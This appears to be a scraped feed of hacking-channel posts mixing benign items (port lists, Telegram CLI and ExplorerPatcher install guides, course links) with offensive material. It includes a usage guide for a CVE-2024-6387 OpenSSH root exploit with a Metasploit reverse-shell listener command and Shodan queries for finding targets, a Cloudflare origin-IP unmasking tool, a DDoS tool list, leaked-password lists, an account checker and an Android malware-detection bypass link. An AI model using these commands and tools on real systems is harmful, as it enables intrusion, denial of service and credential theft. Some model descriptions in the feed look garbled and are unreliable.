🦑Top password lists generated from leaks collected from different paste sites:

https://github.com/rndinfosecguy/pastePasswordLists

🌐 Common Networking Port Numbers:

1️⃣ Port 22 (SSH): Used for Secure Shell (SSH) connections, enabling secure access to remote servers.
2️⃣ Port 80 (HTTP): The standard port for unencrypted web traffic; used by HTTP protocols for web browsing.
3️⃣ Port 443 (HTTPS): Secure HTTP port, vital for encrypted web traffic, ensuring safe data transfer online.
4️⃣ Port 53 (DNS): Domain Name System port, used for translating domain names to IP addresses.
5️⃣ Port 25 (SMTP): Simple Mail Transfer Protocol, responsible for email transmission.
6️⃣ Port 1433 (SQL Server): Microsoft SQL Server communication port, essential for database interactions.
7️⃣ Port 3389 (RDP): Remote Desktop Protocol port, used for remote access to Windows servers.
8️⃣ Port 3306 (MySQL): Default port for MySQL database connections.
9️⃣ Port 123 (NTP): Network Time Protocol, used to synchronize time across systems.

Source: Linkedin

🦑All best AI models in one place:

https://writingmate.ai/labs

🦑Use or automate Telegram like a pro

Telegram Messenger CLI:

A command-line interface (CLI) for Telegram that allows interacting with the Telegram messaging platform directly from the terminal. It provides features like messaging, contact management, and integration with the Telegram API, making it a powerful tool for developers and automation enthusiasts.

---

### Key Features:
1. API Integration: Full access to Telegram's API and MTProto protocol.
2. Command-Line Interaction:
- Messaging.
- Managing contacts and chats.
- Forwarding and deleting messages.
3. Customization:
- Supports TAB completion and command history.
- Configurable paths for server keys and data files.
4. Cross-Platform Compatibility:
- Available for Linux, BSDs, macOS, and other Unix-like systems.
5. Extensibility:
- Python integration for scripting and automation.

---

### Installation:

#### Clone Repository:

git clone --recursive https://github.com/vysheng/tg.git && cd tg

#### Dependencies:
Install the required libraries:

- Ubuntu/Debian:

  sudo apt-get install libreadline-dev libconfig-dev libssl-dev lua5.2 liblua5.2-dev libevent-dev libjansson-dev libpython-dev make
  

- Fedora:

  sudo dnf install lua-devel openssl-devel libconfig-devel readline-devel libevent-devel libjansson-devel python-devel
  

- Arch Linux:

  yaourt -S telegram-cli-git
  

- macOS (Homebrew):

  brew install libconfig readline lua python libevent jansson
  export CFLAGS="-I/usr/local/include -I/usr/local/Cellar/readline/6.3.8/include"
  export LDFLAGS="-L/usr/local/lib -L/usr/local/Cellar/readline/6.3.8/lib"
  

#### Build and Configure:

./configure
make

---

### Usage:

#### Basic Run:

bin/telegram-cli -k tg-server.pub

#### Commands:
- Messaging:

  msg <peer> <Text>
  fwd <user> <msg-seqno>
  mark_read <peer>
  

- Contacts:

  add_contact <phone-number> <first-name> <last-name>
  rename_contact <user> <first-name> <last-name>
  

- Chats:

  chat_with_peer <peer>
  

- Message Management:

  delete_msg <msg-seqno>
  restore_msg <msg-seqno>
  

#### Special Notes:
- Use TAB to auto-complete peer names and commands.
- Peer names:
- Users: Replace spaces with underscores (e.g., John_Doe).
- Chats: Use the chat title, replacing spaces with underscores.
- Encrypted chats: Prefix with ! (e.g., !John_Doe).

---

### Upgrading:
When upgrading to version 1.0:
1. Binary moved to ./bin and renamed to telegram-cli.
2. Config directory updated to ${HOME}/.telegram-cli.
3. Requires re-login due to database incompatibility.
4. Peer names now use @ instead of #.

---

### GitHub Repository:
Find the full documentation, source code, and issue tracker here:
[Telegram CLI Repository](https://github.com/vysheng/tg)

---

This tool is ideal for automation, server-side Telegram management, and for developers looking to integrate Telegram functionality into their workflows. Let me know if you'd like further help with scripting or configuring Telegram CLI!

🦑 leaking and bypassing Android malware detection system:

> old but gold

https://youtu.be/GkMyobbyl88

🦑XyHOSTING ACCOUNT CHECKER:

https://pastebin.com/tTVNmvSN

🦑 ExplorerPatcher Installation and Configuration Guide

ExplorerPatcher enhances the Windows desktop experience, bringing back classic features like the Windows 10 taskbar, Start menu, and Alt+Tab interface on Windows 11.

### How to Install ExplorerPatcher
1. Download the Installer:
- Visit the official source to download the latest version of the setup program.
- Choose the appropriate version:
- ep_setup.exe for Intel or AMD processors.
- ep_setup_arm64.exe for Snapdragon processors.

2. Run the Installer:
- Double-click the setup file.
- Accept the User Account Control (UAC) prompt for elevation.
- The installer will automatically add the required files.

3. Access ExplorerPatcher Settings:
- Once installation is complete, right-click the taskbar and select "Properties" to open the configuration interface.

### Customizing ExplorerPatcher
1. Windows 10 Taskbar on Windows 11:
- Go to the "Taskbar" section.
- Change the Taskbar style to Windows 10 (ExplorerPatcher).

2. Windows 10 Start Menu:
- Navigate to the "Start menu" section.
- Change the Start menu style to Windows 10.

3. Windows 10 Alt+Tab Interface:
- Open the "Window switcher" section.
- Set the Window switcher (Alt+Tab) style to Windows 10.

4. Explore Additional Features:
- Browse through other sections to tweak additional settings, such as system tray behavior, network icons, or window snapping.

### Important Notes
- Make sure your antivirus is configured to allow ExplorerPatcher to avoid interruptions.
- Regularly check for updates to stay compatible with the latest Windows 11 versions.

Download:
https://github.com/valinet/ExplorerPatcher

🦑Modular penetration testing platform that enables you to write, test, and execute exploit code.
HatSploit Framework:

Installing Python
Most Unix-like systems (e.g., Ubuntu or Debian) already include Python. If not, or if you need the latest version, follow these steps:

1. Update your package list:

   sudo apt-get update
   

2. Install Python 3 and pip:

   sudo apt-get install -y python3 python3-pip
   

- This ensures both Python 3 and pip, the Python package manager, are installed.

3. Verify the installation:

   python3 --version
   pip3 --version
   

- These commands should output the installed versions of Python and pip.

---

### Installing HatSploit
1. Install HatSploit Framework via pip:

   pip3 install git+https://github.com/EntySec/HatSploit
   

2. Verify the installation:
- To confirm that HatSploit is installed correctly, try running the framework:

     hatsploit
     

- If the command launches the framework, the installation was successful.

---

### Additional Notes
- Make sure you have git installed on your system to allow pip3 to clone the GitHub repository. If not, install it using:

  sudo apt-get install -y git
  

- If you encounter permission issues during the pip3 install step, try adding --user to the command or use sudo.

Let me know if you need further assistance!

🦑Cheat Sheets for AI, Neural Networks, Machine Learning, Deep Learning & Big Data

🦑AI security related frameworks, attacks, tools and papers:

https://github.com/ottosulin/awesome-ai-security

30 Best Courses For Network Engineer on Youtube:
============================
1. Network Troubleshooting
https://lnkd.in/dkqAVF7U

2. Palo Alto Firewall
https://lnkd.in/dj4NtUMj

3. Cisco SD-WAN
https://lnkd.in/dp6uEDtN

4. Scenario-Based Network Configuration
https://lnkd.in/dA7aTHHA

5. Real-Time Networks Trouble Ticket
https://lnkd.in/dDGYPVs2

6. Viptela SD-WAN Configurations
https://lnkd.in/dXDwhB8u

7. Enterprise Network Configuration
https://lnkd.in/dQhGW4Ae

8. Small Companies Network
https://lnkd.in/d9ffBAKM

9. Switching Technology
https://lnkd.in/dPUCnr86

10. Real Devices Configuration
https://lnkd.in/dMj-HkCA

11. Live Training
https://lnkd.in/dZeX7UdX

12. EIGRP
https://lnkd.in/dMVp98a4

13. Wireless
https://lnkd.in/djjQZPJA

14. ASA Firewall Configuration
https://lnkd.in/djiSD5xE

15. Voice over IP(VoIP)
https://lnkd.in/dsHv2R6V

16. Important Networking Topics
https://lnkd.in/dTsd-h_k

17. OSPF
https://lnkd.in/dUYZME73

18. CCNA 200-301
https://lnkd.in/d8WtGDk6

19. VPN
https://lnkd.in/d7shGyZ6

20. STP
https://lnkd.in/dfVQqetM

21. Basic Configurations
https://lnkd.in/dSybFbZr

22. BGP
https://lnkd.in/dRNCvUgn

23. MPLS
https://lnkd.in/d7ekXYm8

24. IPv6
https://lnkd.in/dGNKcyKT

25. VRF
https://lnkd.in/dxSXx2sK

26. PBR
https://lnkd.in/du4k2BUX

27. EtherChannel
https://lnkd.in/dhxYtpwY

28. FHRP Full Course
https://lnkd.in/d3rzcCfc

29. Subnetting QnA
https://lnkd.in/dZyJjkc5

30. Packet Flow
https://lnkd.in/ddtQ2YJz

𝐓𝐎𝐏 𝟐𝟎 𝐕𝐈𝐑𝐓𝐔𝐀𝐋 𝐌𝐀𝐂𝐇𝐈𝐍𝐄𝐒 𝐅𝐎𝐑 𝐂𝐘𝐁𝐄𝐑𝐒𝐄𝐂𝐔𝐑𝐈𝐓𝐘 𝐏𝐑𝐎𝐅𝐄𝐒𝐒𝐈𝐎𝐍𝐀𝐋𝐒

ℹ️ Here’s a comprehensive list of top VMs tailored for various cybersecurity domains, from Pentesting and Red Teaming to Digital Forensics and Privacy:

💿 Predator-OS (Pentesting):
https://predator-os.ir/

💿 BlackArch Linux (Pentesting):
https://lnkd.in/dQuQV4SK

💿 BackBox (Pentesting):
https://www.backbox.org/

💿 Kookarai (Pentesting):
https://lnkd.in/d-4ckJ97

💿 Parrot Security OS (Red and Blue Team operation):
https://parrotsec.org/

💿 Commando VM (Windows-based Pentesting/Red Teaming):
https://lnkd.in/dec8_V3B

💿 Whonix (Privacy and Anonymity):
https://lnkd.in/dpWagU2f

💿 Tails (Privacy and Anonymity):
https://tails.net/

💿 Qubes OS (Hypervisor):
https://www.qubes-os.org/

💿 Mandiant Threat Pursuit (Windows-based Threat Intelligence and Hunting):
https://lnkd.in/d-N4Dt9x

💿 Tsurugi Linux (Digital Forensics and OSINT):
https://lnkd.in/dsr-ekeB

💿 SIFT Workstation (Digital Forensics):
https://lnkd.in/dmnZRNNP

💿 CSI Linux (Digital Forensics):
https://csilinux.com/

💿 CAINE (Digital Forensics):
https://lnkd.in/dYn9b7Hs

💿 RedHunt Labs-OS Linux (Adversary Emulation and Threat Hunting):
https://lnkd.in/db5sd6h3

💿 FLARE-VM (Reverse Engineering):
https://lnkd.in/ds9s4Wdz

💿 REMnux (Reverse Engineering/Malware Analysis):
https://remnux.org/

💿 Trace Labs OSINT VM (OSINT to Find Missing Persons):
https://lnkd.in/dsymX2KG

💿 Security Onion Solutions, LLC (Threat Hunting, Network Security Monitoring, and Log Management):
https://lnkd.in/d4r6myav

Complete Chart of Neural Networks

🦑Cloudflare Bypass:

CrimeFlare - Bypass Cloudflare WAF and Reveal Real IPs

CrimeFlare is a PHP-based tool designed to identify the original IP address of websites protected by Cloudflare's Web Application Firewall (WAF). This information can be valuable for penetration testing and deeper analysis of websites that rely on Cloudflare for anonymity and security.

---

Features:
1. Cloudflare Information:
- Cloudflare-protected IPs.
- Cloudflare NS1 and NS2 details.
2. Real IP Revelation:
- Unmasks the original IP behind Cloudflare protection.
3. Additional Metadata:
- Hostname.
- Organization.
- Location details (Country, City, Region, Postal Code, Time Zone).

---

Disclaimer:
The tool is for educational and lawful penetration testing purposes only. Misuse of CrimeFlare for unauthorized access or malicious activities is illegal and unethical.

---

Installation:

#### Prerequisites:
1. PHP and php-curl must be installed.
Install on Ubuntu:

   sudo apt install php php-curl
   

#### Clone the Repository:

git clone https://github.com/zidansec/CloudPeler.git
cd CloudPeler

#### Run the Script:
To reveal the real IP behind a domain:

php crimeflare.php example.com

#### Easy Installation:
For quick execution from anywhere on Linux:

sudo wget https://github.com/zidansec/CloudPeler/raw/master/crimeflare.php -O /bin/crimeflare
sudo chmod +x /bin/crimeflare

Now you can run CrimeFlare with:

crimeflare example.com

---

### API Sources:
1. CrimeFlare API: [https://crimeflare.zidansec.com](https://crimeflare.zidansec.com)
2. IPInfo API: [http://ipinfo.io](http://ipinfo.io/2.2.2.2/json)

---

### Code Example:
CrimeFlare uses simple PHP scripting with APIs to gather and process data. The script sends HTTP requests to API endpoints and processes JSON responses to display the original IP and related metadata.

---

### Additional OSINT Tool:
OsintSec:
A tool for visualizing networks from domains, IPs, and emails.
[OsintSec Tool](https://osinthreat.herokuapp.com/)

---

### Quick Commands:
- Clone repository:

  git clone https://github.com/zidansec/CloudPeler.git
  

- Execute the script:

  php crimeflare.php example.com
  

- Install for system-wide access:

  sudo wget https://github.com/zidansec/CloudPeler/raw/master/crimeflare.php -O /bin/crimeflare
  sudo chmod +x /bin/crimeflare
  

- Run directly:

  crimeflare example.com
  

---

### GitHub Repository:
Access the archived repository for full documentation and source code:
[CrimeFlare GitHub Repository](https://github.com/zidansec/CloudPeler)

🦑Largest and most advanced AI models available on Hugging Face in 2024:

1. DeepSeek LLM 67B Base
- Parameters: 67 billion
- Highlights: Exceptional at reasoning, coding, and mathematics, surpassing GPT-3.5 and Llama2-70B.
- Official URL: [DeepSeek LLM 67B Base on Hugging Face](https://huggingface.co/models).

2. Yi-34B-Llama
- Parameters: 34 billion
- Highlights: Multi-modal processing for text, code, and images, with zero-shot learning capabilities.
- Official URL: [Yi-34B-Llama on Hugging Face](https://huggingface.co/models).

3. Qwen/Qwen2.5-72B-Instruct
- Parameters: 72 billion
- Highlights: Advanced role-playing, long text generation, and structured data understanding.
- Official URL: [Qwen2.5-72B-Instruct](https://huggingface.co/Qwen/Qwen2.5-72B-Instruct).

4. Llama 3.3-70B-Instruct
- Parameters: 70 billion
- Highlights: Ideal for daily use with highly capable instruction-following capabilities.
- Official URL: [Llama 3.3-70B-Instruct](https://huggingface.co/meta-llama/Llama-3.3-70B-Instruct).

5. Nyxene-v2-11B
- Parameters: 11 billion
- Highlights: Efficient processing and high fluency in text generation and question answering.
- Official URL: [Nyxene-v2-11B](https://huggingface.co/models).

For a comprehensive list of models and their detailed capabilities, visit [Hugging Face's model hub](https://huggingface.co/models).

🦑Best apk mod websites:

1 apkmody https://apkmody.io ✔️
2 modcombo https://modcombo.com ✔️
3 happymod https://happymod.com ✔️
4 modyolo https://modyolo.com ✔️
5 luckymodapk https://www.luckymodapk.com ✔️
6 an1 https://an1.com ✔️
7 getmodsapk https://getmodsapk.com ✔️
8 moddroid https://moddroid.co ✔️
9 modded-1 https://modded-1.com ✔️
10 techbigs https://techbigs.com ✔️
11 apktodo https://apktodo.com ✔️
12 m.playmods https://m.playmods.net ✔️
13 modradar https://modradar.net ✔️
14 apkmodule https://apkmodule.com ✔️
15 modhello https://modhello.com ✔️

🦑Exploit The 2024 OpenSSH sshd:

A critical vulnerability identified as CVE-2024-6387 affects OpenSSH sshd and allows remote unauthenticated attackers to execute arbitrary code as root due to a signal handler race condition. Below is a comprehensive breakdown of this flaw, usage instructions for associated tools, and mitigation strategies.

🔍 Vulnerability Overview
- **Discovered by: Researchers at Qualys in May 2024.
- Root Cause:
A race condition triggered in the SIGALRM handler of sshd when a client fails to authenticate within the LoginGraceTime (default 120 seconds). This handler invokes functions that are not asynchronous-signal-safe, creating a window for exploitation.
- Impact:
- Allows unauthenticated attackers to gain root privileges remotely.
- Exploits the default LoginGraceTime settings.


🌟 Features of Exploitation Tool
1. Rapid Scanning: Scans multiple IPs, domains, or CIDR ranges for this vulnerability.
2. Version Detection: Identifies OpenSSH versions and checks for patched systems.
3. Banner Retrieval: Fetches SSH banners for identification without authentication.
4. Multi-threading: Increases efficiency and exploit chances using concurrent threads.
5. Customizable Outputs: Saves results in formats like JSON, CSV, or plain text.
6. Port Scanning: Detects open/closed ports and highlights non-responsive hosts.
7. IPv6 Support: Fully compatible with IPv6 scanning.

---

⚙️ Usage Instructions
#### Prerequisites
- Ensure Python 3.x is installed.
- Install dependencies (if required):

  pip install -r requirements.txt
  

#### Basic Commands
- Scan a Target:

  python3 CVE-2024-6387.py scan -T example.com -p 22
  

- Exploit a Target:

  python3 CVE-2024-6387.py exploit -T example.com -p 22 -n eth0
  

#### Advanced Options
| Argument | Description | Default |
|-----------------------|--------------------------------------------------------------|--------------|
| -T, --targets | IP, domain, file path, or CIDR range to scan. | N/A |
| -p, --port | SSH port to target. | 22 |
| -s, --speed | Threads for scanning/exploitation. | 10 |
| -t, --timeout | Connection timeout in seconds. | 1 |
| -o, --output | Output format (csv, txt, json). | json |
| -g, --gracetimecheck| Check for LoginGraceTime mitigation (seconds). | 120 |

---

### Escalation Process
#### Setting Up Payload Listener
Before exploiting, set up a reverse shell listener:

msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST {yourip}; set LPORT 9999; exploit -j"

#### Exploitation Example
Run the exploit tool with the configured settings:

python3 CVE-2024-6387.py exploit -T target.com -p 22 -n eth0

---

### 🔍 Host Discovery
#### OSINT Techniques
- Hunter: /product.name="OpenSSH"
- FOFA: app="OpenSSH"
- SHODAN: product:"OpenSSH"
- CENSYS: (openssh) and labels=remote-access

---

### 🛡 Mitigation Strategies
1. Patch Management
- Upgrade to the latest patched version of OpenSSH to close this vulnerability.

2. Limit Access
- Restrict SSH access to trusted IPs/networks using firewalls or VPNs.

3. Enable Monitoring
- Use IDS/IPS tools to detect and prevent exploitation attempts.

4. Network Segmentation
- Isolate critical systems to reduce lateral movement risks in case of compromise.

5. Log Analysis
- Continuously monitor logs for unusual SSH activities or patterns.

Color-Coded Output
- 🟢 Green: Successful connection or exploit.
- 🔴 Red: Failed connection or error.
- 🟡 Yellow: Warnings or notable information.
- 🔵 Cyan: General updates or information.

Full on: https://github.com/asterictnl-lvdw/CVE-2024-6387

🦑Top DDoS Tools for Educational Penetration Testing in 2024:

Disclaimer: This list is strictly for educational and ethical purposes. Unauthorized use of these tools for malicious activities is illegal and punishable by law. Always seek proper authorization before conducting penetration testing.


1. [LOIC (Low Orbit Ion Cannon)](https://sourceforge.net/projects/loic/)
- Description: A classic open-source tool designed for stress testing. LOIC is beginner-friendly and allows users to send HTTP, UDP, or TCP packets to a target.
- Features:
- User-friendly GUI.
- Manual or automatic attack modes.
- Use Case: Useful for testing smaller systems under stress.

---

2. [HOIC (High Orbit Ion Cannon)](https://github.com/grayhats/hoic)
- Description: An upgraded version of LOIC, HOIC can send multiple HTTP requests simultaneously, making it more potent.
- Features:
- "Booster" scripts to amplify attack strength.
- Open-source.
- Use Case: Effective for simulating HTTP-based volumetric attacks.

---

3. [Xerxes](https://github.com/zanyarjamal/xerxes)
- Description: A lightweight yet powerful tool for layer-7 DDoS attacks.
- Features:
- Portable and efficient.
- Easy-to-use command-line interface.
- Use Case: Ideal for testing web servers' resilience to high-volume HTTP requests.

---

4. [HULK (HTTP Unbearable Load King)](https://github.com/grafov/hulk)
- Description: A unique tool designed for testing web servers by generating dynamic and random HTTP GET requests.
- Features:
- Evades caching mechanisms with randomized requests.
- Simple to configure.
- Use Case: Used for stress-testing websites against large traffic surges.

---

5. [GoldenEye](https://github.com/jseidl/GoldenEye)
- Description: A Python-based tool for generating HTTP and HTTPS requests to overwhelm web servers.
- Features:
- Advanced request customization.
- Supports both HTTP and HTTPS.
- Use Case: Testing web applications for resilience against layer-7 DDoS attacks.

---

6. [UFONet](https://github.com/epsylon/ufonet)
- Description: A multi-vector tool that leverages open proxies and botnets for stress testing.
- Features:
- Supports multiple attack vectors.
- GUI and CLI interfaces available.
- Use Case: Testing distributed attacks with open proxy networks.

---

7. [DDOSIM (DDoS Simulator)](https://sourceforge.net/projects/ddosim/)
- Description: A simulation tool that replicates a botnet by performing DDoS attacks like TCP, HTTP, and UDP floods.
- Features:
- Simulates real botnet behavior.
- Layer-7 attack simulation.
- Use Case: Ideal for advanced penetration testers studying application-layer attacks.